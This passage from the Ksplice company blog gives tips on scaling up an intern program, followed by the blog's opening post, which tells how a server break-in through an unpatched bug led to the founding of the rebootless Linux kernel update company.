  • Tolerate a little crowding. It took a little creativity to suddenly find a dozen new workspaces in our two-room office. Fortunately, we've found that a room can always fit one more person---and by induction, you can fit as many as you need. (All those years we spent proving math theorems came in handy after all.) Seating everyone close to each other has an important advantage, too: when lots of people on your team have just started, it's handy for them to work right next to the mentors who are answering their questions and helping them ramp up on the learning curve of the organization. With the right team, the crowding can also create an energetic office environment that makes people love to come in to work. (Sometimes it gets in the way of concentration, though---that's when I put on a good pair of headphones.)
  • Locate next to a deep pool of hackers. OK, so we're a bit spoiled by being headquartered a few blocks away from the Massachusetts Institute of Technology. At MIT, January is set aside for students to pursue projects outside of the curriculum---perfect for hiring an intern army. Many other institutions have either a similar "January term", or a program for students to spend time working in industry during the term.
  • Know who the best people are and only hire them. Ksplice was born four years ago at SIPB, MIT's student computing group. When a group of students run computing services thousands of people rely on, and spend hours each week discussing, dreaming, collaborating, and learning from each other on computer systems---some of them get really good at it. Even better, everyone sees everyone else in action and knows exactly what it's like to work with them. Investing some time into getting involved with technical communities makes it possible to hire people based on personal experience with them and their work, which is so much better than hiring based on resumes and interviews. Companies like Google and Red Hat have known for years that being involved in the open source community can provide an excellent source of vetted job candidates.
  • Pay well. In some industries, "intern" means "unpaid"---but computer science students have plenty of options, and you want to be able to hire the best people. We looked at pay rates for jobs on campus, and pegged our rate to the high end of those.
  • Divide tasks to be as loosely-coupled as possible. Our internship program would never have worked if we had assigned a dozen new people to hack on our kernel code---the training time and communication costs that drive Brooks' Law would have swallowed their efforts whole. Fortunately, like any growing business, we had a constellation of tasks that lie around the edges of our core technology: infrastructure upgrades, additional layers of QA, business analytics, and new features in the management side of our product. These had manageable technical interfaces our existing software, so our interns were able to become productive with minimal ramp-up and rely on relatively little communication to get their projects done.
  • Design your intern projects in advance. A key challenge when scaling up your engineering team quickly is making sure that the interfaces are all well designed and the new projects will meet the company's needs. So we spent a good deal of time getting these designs together before the interns started. We also allocated plenty of our core engineers' time for code reviews and other feedback with our interns in order to make sure their work would be maintainable after they left.
Have you achieved more in one month than anyone thought should be possible? How did you do it?

[Edited to make clear our interns were paid and to say more about how we designed their projects for high-quality output.]

~price

Thursday Mar 04, 2010

/etc/init.d/blog start

Welcome to the Ksplice blog!

I struggled for quite some time coming up with a grand opening for this blog. Something profound like "We the people, in order to form more perfect computing..." or "The history of the world is the history of rebooting". But that proved too hard, so instead, I want to take a moment to briefly tell the Ksplice story, in the hopes of providing a bit more insight into who we are and what we're all about.

Ksplice was born on a beautiful summer day back in 2006. Crickets chirping, little kids splashing each other by the pool, ice cream trucks, etc. Ksplice's CEO, Jeff Arnold, then a student, was administering some very popular servers at MIT. A software update came out in the middle of the week, and, as any prudent system administrator would, he scheduled an outage window for the following Sunday at 2am, so as to disrupt as few users as possible, and went along his merry way.

Swimming pool
Where I wish I had been, Summer 2006
Of course, something much more sinister was lying in wait. Someone took advantage of the very bug that the update would have fixed, and used it to break into the system. I'm told that this event inspired the Alanis Morissette song, Ironic, but that "It's like the security update / when you're already hacked" didn't quite have the right rhythm to it.

You know how every superhero has some sort of traumatic childhood event that totally explains them? Like Bruce Wayne, Peter Parker, or even Fox Mulder? This was it for Ksplice---and really got Jeff thinking "Why do software updates have to be so disruptive?"

So he set out to solve the problem, in his award-winning master's thesis. The rest was a no-brainer: the need was obviously there, so he, Tim Abbott, Anders Kaseorg, and I founded Ksplice, Inc. in June of 2008.

Declaration of Independence
Ksplice, Inc.'s founding charter

A lot has stayed the same since June 2008: we're still slaving away in Cambridge, Massachusetts, working hard to bring you the finest-quality updates made only from fresh, organic free-range kernel source code. But a lot has also changed. For example, we're now up to twenty-something men and women. I've honestly lost count of the exact number (good thing I don't do payroll).

We're also a really tight-knit group, and share an interesting background: we're all humans, we all went to MIT, we all studied computer science, and we all were in MIT's student computing group, SIPB, together.

As you might have guessed, we like to geek out about, well, basically everything, and I'd be very surprised if that doesn't come out in this blog. The authorship of posts here will also rotate fairly regularly among my fellow Ksplicians (or is it Ksplicers?), and I'm definitely looking forward to their posts and your comments.

So go and add this to your Google Reader, Twitter, or whatever it is the kids are using to read blogs these days--you'll be glad you did.
About

Tired of rebooting to update systems? So are we -- which is why we invented Ksplice, technology that lets you update the Linux kernel without rebooting. It's currently available as part of Oracle Linux Premier Support, Fedora, and Ubuntu desktop. This blog is our place to ramble about technical topics that we (and hopefully you) think are interesting.

Search

Archives
« February 2012
SunMonTueWedThuFriSat
   
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
   
       
Today